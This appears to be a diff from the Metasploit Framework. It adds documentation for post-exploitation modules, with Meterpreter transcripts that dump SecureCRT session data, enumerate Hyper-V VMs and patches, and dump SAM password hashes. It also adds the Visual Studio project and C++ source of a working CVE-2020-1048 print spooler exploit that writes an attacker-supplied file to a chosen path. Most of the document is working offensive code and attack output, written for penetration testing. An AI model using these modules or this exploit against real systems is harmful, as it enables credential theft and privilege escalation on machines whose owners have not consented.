+### Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled, But No Password Provided)
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
+msf6 post(windows/gather/credentials/securecrt) > info
+
+       Name: Windows SecureCRT Session Information Enumeration
+     Module: post/windows/gather/credentials/securecrt
+   Platform: Windows
+       Arch:
+       Rank: Normal
+
+Provided by:
+  HyperSine
+  Kali-Team <kali-team@qq.com>
+
+Compatible session types:
+  Meterpreter
+
+Basic options:
+  Name        Current Setting   Required  Description
+  ----        ---------------   --------  -----------
+  PASSPHRASE                    no        The configuration password that was set when SecureCRT was installed, if one was supplied
+  SESSION                       yes       The session to run this module on.
+
+Description:
+  This module will determine if SecureCRT is installed on the target
+  system and, if it is, it will try to dump all saved session
+  information from the target. The passwords for these saved sessions
+  will then be decrypted where possible, using the decryption
+  information that HyperSine reverse engineered. Note that whilst
+  SecureCRT has installers for Linux, Mac and Windows, this module
+  presently only works on Windows.
+
+References:
+  https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
+
+msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
+SESSION => 1
+msf6 post(windows/gather/credentials/securecrt) > run
+
+[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
+[*] Searching for session files in C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
+[-] It seems the user set a configuration password when installing SecureCRT!
+[-] If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
+SecureCRT Sessions
+==================
+
+Filename       Hostname   Port  Username              Password
+--------       --------   ----  --------              --------
+127.0.0.1.ini  127.0.0.1  22    RAPID7\Administrator
+
+[+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125521_default_172.20.150.24_host.securecrt_s_951139.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/securecrt) >
+```
@@ -0,0 +1,134 @@
+## Vulnerable Application
+
+  This post-exploitation module will check if a host is running Hyper-V. If the host is running Hyper-V, the module
+  will gather information about all Hyper-V VMs installed on the host, including the name of the VM, its status,
+  CPU usage, version of the Hyper-V engine that it relies on, and its state (running, suspended, offline, etc).
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/enum_hyperv_vms`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. If the host has Hyper-V installed, a list of Hyper-V VMs which are on target host will be returned, along with their attributes.
+
+## Options
+
+This module just uses the standard options available to any post module.
+
+## Extracted data
+
+  - Name of each VM
+  - State of each VM
+  - CPU Usage of each VM
+  - How long each VM has been running for, down to the milliseconds.
+  - Amount of memory assigned to each VM
+  - Status of each VM
+  - The version of the Hyper-V engine that each VM is using.
+
+## Scenarios
+
+### Meterpreter session as a normal user on Windows Server 2019 Standard Edition - fails as user lacks required permissions
+
+```
+msf6 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.20.150.24:4444
+[*] Sending stage (200262 bytes) to 172.20.150.24
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.20.150.24:4444) at 2020-09-10 18:33:16 -0500
+
+meterpreter > getuid
+Server username: RAPID7\normal
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeMachineAccountPrivilege
+
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use post/windows/gather/enum_hyperv_vms 
+msf6 post(windows/gather/enum_hyperv_vms) > show options
+
+Module options (post/windows/gather/enum_hyperv_vms):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+msf6 post(windows/gather/enum_hyperv_vms) > set session 1
+session => 1
+msf6 post(windows/gather/enum_hyperv_vms) > run
+
+[+] Compressed size: 800
+[-] You need to be running as an elevated admin or a user of the Hyper-V Administrators group to run this module
+[*] Post module execution completed
+msf6 post(windows/gather/enum_hyperv_vms) > 
+```
+
+### Meterpreter session as an elevated admin user
+```
+msf6 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.20.150.24:4444
+[*] Sending stage (200262 bytes) to 172.20.150.24
+[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.20.150.24:4444) at 2020-09-10 18:43:15 -0500
+
+meterpreter > getuid
+Server username: RAPID7\Administrator
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeBackupPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeCreatePagefilePrivilege
+SeCreateSymbolicLinkPrivilege
+SeDebugPrivilege
+SeEnableDelegationPrivilege
+SeImpersonatePrivilege
+SeIncreaseBasePriorityPrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeLoadDriverPrivilege
+SeMachineAccountPrivilege
+SeManageVolumePrivilege
+SeProfileSingleProcessPrivilege
+SeRemoteShutdownPrivilege
+SeRestorePrivilege
+SeSecurityPrivilege
+SeShutdownPrivilege
+SeSystemEnvironmentPrivilege
+SeSystemProfilePrivilege
+SeSystemtimePrivilege
+SeTakeOwnershipPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 exploit(multi/handler) > use post/windows/gather/enum_hyperv_vms 
+msf6 post(windows/gather/enum_hyperv_vms) > set SESSION 2 
+SESSION => 2
+msf6 post(windows/gather/enum_hyperv_vms) > run
+
+[+] Compressed size: 800
+[*] Name           State   CPUUsage(%) MemoryAssigned(M) Uptime           Status             Version
+----           -----   ----------- ----------------- ------           ------             -------
+Test Machine   Off     0           0                 00:00:00         Operating normally 9.0    
+Windows XP SP3 Running 79          2048              02:54:58.3210000 Operating normally 9.0    
+
+[+] Stored loot at /home/gwillcox/.msf4/loot/20200910184541_default_172.20.150.24_host.hyperv_vms_309544.txt
+[*] Post module execution completed
+msf6 post(windows/gather/enum_hyperv_vms) > 
+```
@@ -2,7 +2,8 @@
 ## Vulnerable Application

  This module will attempt to enumerate which patches are applied to a
-  windows system based on the result of the WMI query: `SELECT HotFixID FROM Win32_QuickFixEngineering`.
+  Windows system, as well as on which date they were applied, based on
+  the result of the WMI query `SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering`.

 ## Verification Steps

@@ -28,37 +29,31 @@

 ## Scenarios

-### Windows 7 (6.1 Build 7601, Service Pack 1).
+### Windows 10 x64 v1909

  ```
-  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49223) at 2019-12-14 08:37:46 -0700
+  msf6 exploit(multi/handler) > use post/windows/gather/enum_patches
+  msf6 post(windows/gather/enum_patches) > show options

-  msf > use post/windows/gather/enum_patches
-  msf post(windows/gather/enum_patches) > set SESSION 1
-    SESSION => 1
-  msf post(windows/gather/enum_patches) > run
-    [-] Known bug in WMI query, try migrating to another process
-    [*] Post module execution completed
-  msf post(windows/gather/enum_patches) > sessions 1
-    [*] Starting interaction with 1...
-  meterpreter > run post/windows/manage/migrate
+  Module options (post/windows/gather/enum_patches):

-    [*] Running module against TEST-PC
-    [*] Current server process: Explorer.EXE (1908)
-    [*] Spawning notepad.exe process to migrate to
-    [+] Migrating to 3992
-    [+] Successfully migrated to process 3992
-  meterpreter > background
-    [*] Backgrounding session 1...
-  msf post(windows/gather/enum_patches) > run
+    Name     Current Setting  Required  Description
+    ----     ---------------  --------  -----------
+    SESSION                   yes       The session to run this module on.

-    [+] KB2871997 is missing
-    [+] KB2928120 is missing
-    [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
-    [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
-    [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
-    [+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
-    [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
-    [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
-    [*] Post module execution completed
+  msf6 post(windows/gather/enum_patches) > set SESSION 1
+  SESSION => 1
+  msf6 post(windows/gather/enum_patches) > run
+
+  [*] Patch list saved to /home/gwillcox/.msf4/loot/20200902125729_default_172.29.215.21_enum_patches_495652.txt
+  [+] KB4569751 installed on 8/17/2020
+  [+] KB4497165 installed on 8/17/2020
+  [+] KB4517245 installed on 4/10/2020
+  [+] KB4537759 installed on 4/10/2020
+  [+] KB4552152 installed on 4/10/2020
+  [+] KB4561600 installed on 8/17/2020
+  [+] KB4569073 installed on 8/17/2020
+  [+] KB4565351 installed on 8/17/2020
+  [*] Post module execution completed
+  msf6 post(windows/gather/enum_patches) >
  ```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+The post/windows/gather/smart_hashdump module dumps local accounts from the SAM database. If the target host
+is a Domain Controller, it will dump the Domain Account Database using the proper technique depending
+on privilege level, OS and role of the host.
+
+Hashes will be saved to the Metasploit database in John the Ripper format for later use.
+
+To be able to use post/windows/gather/smart_hashdump, you must meet these requirements:
+
+* You are on a Meterpreter type session.
+* The target is a Windows platform.
+* It must be executed under the context of a high privilege account, such as SYSTEM.
+
+## Verification Steps
+
+1. Obtain a meterpreter shell on a Windows system, and ensure that you have SYSTEM privileges
+   or are running as a highly privileged user.
+1. `use post/windows/gather/smart_hashdump`
+1. Specify the session, eg: `set SESSION 1`
+1. If necessary, tell the module to attempt to elevate to SYSTEM before
+   attempting to dump the credentials with the command: `set GETSYSTEM true`.
+1. Run the module.
+
+## Options
+
+### GETSYSTEM
+Attempt to run the `getsystem` module on the target host to get `NT AUTHORITY\SYSTEM` privileges prior to dumping the hashes.
+
+## Scenarios
+
+**High Privilege Account on Windows 10 x64 v2004**
+
+Before using post/windows/gather/smart_hashdump, there is a possibility you need to escalate your privileges.
+This module features a `GETSYSTEM` option, which will attempt to elevate from a high privileged account to `NT AUTHORITY\SYSTEM`.
+This can be seen in the following example which is running as a high privileged user in which the module
+fails to run successfully as the current user is not `NT AUTHORITY\SYSTEM`. By using the `GETSYSTEM` option, the user is able
+to elevate themselves to `NT AUTHORITY\SYSTEM` using Metasploit's `getsystem` module, after which they are then able
+to dump the password hashes.
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/smart_hashdump
+msf6 post(windows/gather/smart_hashdump) > show options
+
+Module options (post/windows/gather/smart_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
+   SESSION                     yes       The session to run this module on.
+
+msf6 post(windows/gather/smart_hashdump) > set SESSION 1
+SESSION => 1
+msf6 post(windows/gather/smart_hashdump) > run
+
+[*] Running module against DESKTOP-G7A2R2R
+[*] Hashes will be saved to the database if one is connected.
+[+] Hashes will be saved in loot in JtR password file format to:
+[*] /home/kali/.msf4/loot/20201008121933_default_192.168.56.117_windows.hashes_338495.txt
+[-] Insufficient privileges to dump hashes!
+[*] Post module execution completed
+msf6 post(windows/gather/smart_hashdump) > set GETSYSTEM true
+GETSYSTEM => true
+msf6 post(windows/gather/smart_hashdump) > run
+
+[*] Running module against DESKTOP-G7A2R2R
+[*] Hashes will be saved to the database if one is connected.
+[+] Hashes will be saved in loot in JtR password file format to:
+[*] /home/kali/.msf4/loot/20201008122008_default_192.168.56.117_windows.hashes_353942.txt
+[*] Dumping password hashes...
+[*] Trying to get SYSTEM privilege
+[+] Got SYSTEM privilege
+[*]     Obtaining the boot key...
+[*]     Calculating the hboot key using SYSKEY 4934844cf0365459683ed18d9ebcb903...
+[*]     Obtaining the user list and keys...
+[*]     Decrypting user keys...
+[*]     Dumping password hints...
+[*]     No users with password hints on this system
+[*]     Dumping password hashes...
+[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+]     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+]     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+]     user:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[*] Post module execution completed
+```
+
+**Running as the SYSTEM user on Windows 7 x64 SP1**
+```
+msf6 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.24.15.185:4444
+[*] Sending stage (200262 bytes) to 172.24.15.185
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.24.15.185:4444) at 2020-10-08 12:46:47 -0500
+
+meterpreter > getuid
+Server username: test-PC\test
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use post/windows/gather/smart_hashdump
+msf6 post(windows/gather/smart_hashdump) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 post(windows/gather/smart_hashdump) > set SESSION 1
+SESSION => 1
+msf6 post(windows/gather/smart_hashdump) > run
+
+[*] Running module against TEST-PC
+[*] Hashes will be saved to the database if one is connected.
+[+] Hashes will be saved in loot in JtR password file format to:
+[*] /home/gwillcox/.msf4/loot/20201008124735_default_172.24.15.185_windows.hashes_456389.txt
+[*] Dumping password hashes...
+[*] Running as SYSTEM extracting hashes from registry
+[*] 	Obtaining the boot key...
+[*] 	Calculating the hboot key using SYSKEY 8e9f8fa11359f037112782911694d611...
+[*] 	Obtaining the user list and keys...
+[*] 	Decrypting user keys...
+[*] 	Dumping password hints...
+[+] 	test:"a"
+[+] 	test2:"asdf"
+[*] 	Dumping password hashes...
+[+] 	Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+] 	test:1000:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
+[+] 	test2:1001:aad3b435b51404eeaad3b435b51404ee:0e8231621f574d3636255ff36dd86c9c:::
+[*] Post module execution completed
+msf6 post(windows/gather/smart_hashdump) >
+```
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30413.136
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2020-1048-exe", "cve-2020-1048-exe\cve-2020-1048-exe.vcxproj", "{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Debug|x64.ActiveCfg = Debug|x64
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Debug|x64.Build.0 = Debug|x64
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Debug|x86.ActiveCfg = Debug|Win32
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Debug|x86.Build.0 = Debug|Win32
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Release|x64.ActiveCfg = Release|x64
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Release|x64.Build.0 = Release|x64
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Release|x86.ActiveCfg = Release|Win32
+		{F2BBCD13-8441-45C0-A8E3-AE2FB4DE4FB0}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {D4DFD17B-C932-47F1-A2F9-04B02131CEFA}
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,253 @@
+#include <windows.h>
+#include <cstring>
+#include <stdio.h>
+
+LPWSTR g_DriverName = const_cast<LPWSTR>(L"Generic / Text Only");
+LPWSTR g_PrinterName = const_cast <LPWSTR>(L"ColorMeIn");
+LPWSTR g_PrinterOpenName = const_cast <LPWSTR>(L",XcvMonitor Local Port");
+
+int cleanupPath(HANDLE hPrinter, HANDLE hMonitor, LPWSTR g_PortName)
+{
+    //
+    // Now delete the printer and close the handle
+    //
+    BOOL bRes = false;
+    DWORD dwNeeded = 0;
+    DWORD dwStatus = 0;
+    if (hPrinter != NULL)
+    {
+        bRes = DeletePrinter(hPrinter);
+        if (bRes == FALSE)
+        {
+            //
+            // Non fatal, this is the cleanup path
+            //
+            printf("[-] Failed to delete printer: %lx\n", GetLastError());
+        }
+        else {
+            printf("[+] Printer deleted\n");
+            ClosePrinter(hPrinter);
+        }
+    }
+
+    //
+    // Cleanup our port
+    //
+    if (hMonitor != NULL)
+    {
+        dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);
+        bRes = XcvData(hMonitor,
+            L"DeletePort",
+            (LPBYTE)g_PortName,
+            dwNeeded,
+            NULL,
+            0,
+            &dwNeeded,
+            &dwStatus);
+        if (bRes == FALSE)
+        {
+            //
+            // Non fatal, this is the cleanup path
+            //
+            printf("[-] Failed to delete port: %lx\n", GetLastError());
+        }
+        else {
+
+            //
+            // Close the monitor port
+            //
+            printf("[+] Port deleted\n");
+            ClosePrinter(hMonitor);
+        }
+    }
+    return 0;
+}
+
+
+INT
+wmain(
+    _In_ INT ArgumentCount,
+    _In_ wchar_t* Arguments[]
+)
+{
+    HRESULT hr;
+    PRINTER_INFO_2 printerInfo;
+    HANDLE hPrinter;
+    HANDLE hMonitor;
+    BOOL bRes;
+    DWORD dwNeeded, dwStatus;
+    PRINTER_DEFAULTS printerDefaults;
+    DWORD dwExists;
+    struct
+    {
+        ADDJOB_INFO_1 jobInfo;
+        WCHAR pathString[MAX_PATH];
+    } job;
+
+    if (ArgumentCount != 3)
+    {
+        wprintf(L"exe destination source");
+    }
+    size_t buff_size = 512;
+    DWORD dwJobId;
+    DOC_INFO_1 docInfo;
+
+    //
+    // Initialize variables
+    //
+    UNREFERENCED_PARAMETER(Arguments);
+    ZeroMemory(&job, sizeof(job));
+    hPrinter = NULL;
+    hMonitor = NULL;
+
+
+    //
+    // Open a handle to the XCV port of the local spooler
+    //
+    printerDefaults.pDatatype = NULL;
+    printerDefaults.pDevMode = NULL;
+    printerDefaults.DesiredAccess = SERVER_ACCESS_ADMINISTER;
+    bRes = OpenPrinter(g_PrinterOpenName, &hMonitor, &printerDefaults);
+    if (bRes == FALSE)
+    {
+        printf("Error opening XCV handle: %lx\n", GetLastError());
+        cleanupPath(hPrinter, hMonitor, Arguments[1]);
+    }
+
+    //
+    // Check if the target port name already exists 
+    //
+    dwNeeded = ((DWORD)wcslen(Arguments[1]) + 1) * sizeof(WCHAR);
+    dwExists = 0;
+    bRes = XcvData(hMonitor,
+        L"PortExists",
+        (LPBYTE)Arguments[1],
+        dwNeeded,
+        (LPBYTE)&dwExists,
+        sizeof(dwExists),
+        &dwNeeded,
+        &dwStatus);
+    if (dwExists == 0)
+    {
+        //
+        // It doesn't, so create it!
+        //
+        dwNeeded = ((DWORD)wcslen(Arguments[1]) + 1) * sizeof(WCHAR);
+        bRes = XcvData(hMonitor,
+            L"AddPort",
+            (LPBYTE)Arguments[1],
+            dwNeeded,
+            NULL,
+            0,
+            &dwNeeded,
+            &dwStatus);
+        if (bRes == FALSE)
+        {
+            printf("[-] Failed to add port: %lx\n", dwStatus);
+            cleanupPath(hPrinter, hMonitor, Arguments[1]);
+        }
+    }
+    else {
+        printf("[-] Port Already exists: %lx\n", dwStatus);
+        cleanupPath(hPrinter, hMonitor, Arguments[1]);
+    }
+
+    //
+    // Check if the printer already exists
+    //
+    printerDefaults.pDatatype = NULL;
+    printerDefaults.pDevMode = NULL;
+    printerDefaults.DesiredAccess = PRINTER_ALL_ACCESS;
+    bRes = OpenPrinter(g_PrinterName, &hPrinter, &printerDefaults);
+    if ((bRes == FALSE) && (GetLastError() == ERROR_INVALID_PRINTER_NAME))
+    {
+        //
+        // First, install the generic text only driver. Because this is already
+        // installed, no privileges are required to do so.
+        //
+        hr = InstallPrinterDriverFromPackage(NULL, NULL, g_DriverName, NULL, 0);
+        if (FAILED(hr))
+        {
+            printf("[-] Failed to install print driver: %lx\n", hr);
+            cleanupPath(hPrinter, hMonitor, Arguments[1]);
+        }
+
+        //
+        // Now create a printer to attach to this port
+        // This data must be valid and match what we created earlier
+        //
+        ZeroMemory(&printerInfo, sizeof(printerInfo));
+        printerInfo.pPortName = Arguments[1];
+        printerInfo.pDriverName = g_DriverName;
+        printerInfo.pPrinterName = g_PrinterName;
+
+        //
+        // This data must always be as indicated here
+        //
+        printerInfo.pPrintProcessor = const_cast < LPWSTR>(L"WinPrint");
+        printerInfo.pDatatype = const_cast < LPWSTR>(L"RAW");
+
+        //
+        // This part is for fun/to find our printer easily
+        //
+        printerInfo.pComment = const_cast < LPWSTR>(L"I'd be careful with this one...");
+        printerInfo.pLocation = const_cast < LPWSTR>(L"Inside of an exploit");
+        printerInfo.Attributes = PRINTER_ATTRIBUTE_RAW_ONLY | PRINTER_ATTRIBUTE_HIDDEN;
+        printerInfo.AveragePPM = 9001;
+        hPrinter = AddPrinter(NULL, 2, (LPBYTE)&printerInfo);
+        if (hPrinter == NULL)
+        {
+            printf("[-] Failed to create printer: %lx\n", GetLastError());
+            cleanupPath(hPrinter, hMonitor, Arguments[1]);
+        }
+        else
+        {
+            printf("[+] Printer created successfully");
+        }
+    }
+
+    //
+    // Purge the printer of any previous jobs
+    //
+    bRes = SetPrinter(hPrinter, 0, NULL, PRINTER_CONTROL_PURGE);
+    if (bRes == FALSE)
+    {
+        printf("Failed to purge jobs: %lx\n", GetLastError());
+        cleanupPath(hPrinter, hMonitor, Arguments[1]);
+    }
+
+    //
+    // Getting the dll buffer data
+    //
+    HANDLE hFile = CreateFileW(Arguments[2], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == NULL)
+    {
+        wprintf(L"[-] Unable to find input file %s", Arguments[1]);
+        cleanupPath(hPrinter, hMonitor, Arguments[1]);
+    }
+    DWORD lFileSize = GetFileSize(hFile, NULL);
+    //printf("file size : %d\n", lFileSize);
+    BYTE* hDllBuffer = (BYTE*)malloc(lFileSize);
+    DWORD lpBytesRead = 0;
+    ReadFile(hFile, hDllBuffer, lFileSize, &lpBytesRead, NULL);
+    CloseHandle(hFile);
+
+    //
+    //Writing to the printer
+    //
+    docInfo.pDatatype = const_cast < LPWSTR>(L"RAW");
+    docInfo.pOutputFile = NULL;
+    docInfo.pDocName = const_cast < LPWSTR>(L"Ignore Me");
+    dwJobId = StartDocPrinter(hPrinter, 1, (LPBYTE)&docInfo);
+    bRes = WritePrinter(hPrinter,
+        hDllBuffer,
+        lFileSize,
+        &dwNeeded);
+    if (bRes == FALSE)
+    {
+        printf("[-] Failed to write the spooler data: %lx\n", GetLastError());
+        cleanupPath(hPrinter, hMonitor, Arguments[1]);
+    }
+    EndDocPrinter(hPrinter);
+    return 0;
+}
@@ -0,0 +1,153 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Source.cpp" />
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{f2bbcd13-8441-45c0-a8e3-ae2fb4de4fb0}</ProjectGuid>
+    <RootNamespace>cve20201048exe</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName).$(Platform)</TargetName>
+    <OutDir>..\..\..\..\..\..\data\exploits\CVE-2020-1048</OutDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>..\..\..\..\..\..\data\exploits\CVE-2020-1048</OutDir>
+    <TargetName>$(ProjectName).$(Platform)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
